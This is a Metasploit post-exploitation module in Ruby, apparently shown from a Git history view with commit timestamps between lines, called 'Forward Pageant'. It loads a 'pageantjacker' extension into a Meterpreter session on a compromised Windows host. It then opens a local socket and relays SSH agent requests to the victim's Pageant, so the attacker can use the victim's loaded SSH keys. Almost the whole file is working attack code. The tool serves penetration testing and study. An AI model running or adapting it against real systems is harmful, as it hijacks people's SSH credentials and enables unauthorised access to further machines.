metasploit-framework/modules/post/windows/manage/forward_pageant.rb

74 lines
2.1 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
2015-05-19 08:55:38 +00:00
require 'tmpdir'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
def initialize(info={})
super( update_info( info,
'Name' => 'Forward Pageant',
'Description' => %q{
This module forwards Pageant.
},
'License' => MSF_LICENSE,
'Author' => 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
2015-05-19 08:55:38 +00:00
#register_options(
# [
# ], self.class)
end
def run
## load incognito
if(!session.pageantjacker)
session.core.use("pageantjacker")
end
if(!session.pageantjacker)
print_error("Failed to load pageantjacker on #{session.sid} (#{session.session_host})")
2015-05-19 08:55:38 +00:00
return false
end
sockpath = "#{::Dir::Tmpname.tmpdir}/#{::Dir::Tmpname.make_tmpname('pageantjacker', 5)}"
if ::File.exists?(sockpath)
print_error("Your requested socket (#{sockpath}) already exists. Remove it or choose another path and try again.")
2015-05-19 08:55:38 +00:00
return false
end
::UNIXServer.open(sockpath) {|serv|
print_status("Launched listening socket on #{sockpath}.")
print_status("Set your SSH_AUTH_SOCK variable to #{sockpath} (export SSH_AUTH_SOCK=\"#{sockpath}\"")
print_status("Now use any tool normally (e.g. ssh-add)")
loop {
s = serv.accept
loop {
socket_request_data = s.recvfrom(8192)
break if socket_request_data.nil? || socket_request_data.first.nil? || socket_request_data.first.empty?
response_data = client.pageantjacker.forward_to_pageant(socket_request_data.first, socket_request_data.first.size)
s.send response_data,0 if !response_data.nil?
}
}
}
if ::File.exists?(sockpath)
print_status("Cleaning up; removing #{sockpath}")
2015-05-19 08:55:38 +00:00
::File.delete(sockpath)
else
print_status("Unable to remove socket #{sockpath}")
2015-05-19 08:55:38 +00:00
end
end
end